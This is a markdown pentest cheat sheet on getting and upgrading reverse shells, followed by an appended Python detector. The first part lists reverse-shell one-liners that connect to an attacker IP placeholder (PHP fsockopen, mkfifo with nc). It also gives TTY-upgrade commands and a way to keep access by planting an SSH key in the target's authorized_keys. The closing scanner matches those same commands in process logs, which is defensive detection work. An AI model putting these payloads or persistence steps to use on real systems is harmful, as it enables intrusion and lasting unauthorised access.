# Upgrade Reverse Shell

* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)

## Via interpreter

### PHP

* reverse shell

```php
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```

```php
php -r 'exec("/bin/bash");'
```

* Sometimes even

```php
php -e 'exec "/bin/bash";'
```

### Python

```python
python -c 'import pty; pty.spawn("/bin/bash")'
```

### Perl

```perl
perl -e 'exec "/bin/sh";'
```

### Script

```sh
/usr/bin/script -qc /bin/bash /dev/null
```

## Next

1. `ctrl` + `z`
2. `stty raw -echo`
3. `fg`
4. `export SHELL=bash`
5. `export TERM=xterm`

## Via SSH

* `ssh-keygen`
* copy the private key and `chmod 600` it
* `cat id_rsa.pub > authorized_keys` on target

## As Code

### PHP

```php
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
```
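
From the defender's side, the one-liners on this page leave recognisable process command lines. The following is an added example (not part of the original page) that matches them in process-creation logs; the log format, rule names, `SERVICE_PARENTS` list and sample events are assumptions constructed for illustration.

```python
import re

# Rules derived from the one-liners on this page; rule names are this example's own.
RULES = {
    "python-pty-spawn": re.compile(r"\bpython[\d.]*\s+-c\s.*\bpty\.spawn\("),
    "script-pty": re.compile(r"\bscript\s+-\w*c\w*\s+\S*sh\s+/dev/null"),
    "interp-exec-shell": re.compile(r"\b(?:php|perl)\s+-[re]\s.*\bexec\s*\(?\s*[\"']/bin/(?:ba)?sh"),
    "php-socket-shell": re.compile(r"\bphp\s+-r\s.*fsockopen\(.*/bin/(?:ba)?sh\s+-i"),
    "mkfifo-nc-shell": re.compile(r"\bmkfifo\s+(\S+?)\s*;.*\bcat\s+\1\s*\|.*sh\s+-i.*\|\s*nc\b"),
}

# Assumption: parents that should never spawn an interactive shell on this host.
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}

# Assumed (hypothetical) log format: "user=<name> parent=<comm> cmd=<full command line>"
LINE_RE = re.compile(r"^user=(\S+) parent=(\S+) cmd=(.*)$")

def scan(lines):
    """Return one finding per log line that matches at least one rule."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected format
        user, parent, cmd = m.groups()
        hits = [name for name, rx in RULES.items() if rx.search(cmd)]
        if hits:
            # A shell one-liner spawned directly by a service daemon is rated higher.
            severity = "high" if parent in SERVICE_PARENTS else "medium"
            findings.append({"user": user, "parent": parent, "rules": hits, "severity": severity})
    return findings

# Constructed sample events (192.0.2.10 is a documentation address).
SAMPLE = [
    "user=www-data parent=apache2 cmd=sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 > /tmp/f",
    "user=www-data parent=sh cmd=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "user=www-data parent=sh cmd=/usr/bin/script -qc /bin/bash /dev/null",
    "user=www-data parent=php-fpm cmd=php -r '$sock=fsockopen(\"192.0.2.10\", 4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "user=alice parent=bash cmd=perl -e 'exec \"/bin/sh\";'",
    "user=alice parent=bash cmd=python -c 'print(1)'",
    "user=bob parent=bash cmd=script session.log",
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["severity"], f["user"], f["parent"], ",".join(f["rules"]))
```

Command-line matching only catches the literal forms listed here, so pair it with parent/child process rules (service daemon spawning a shell or `nc`) rather than relying on it alone.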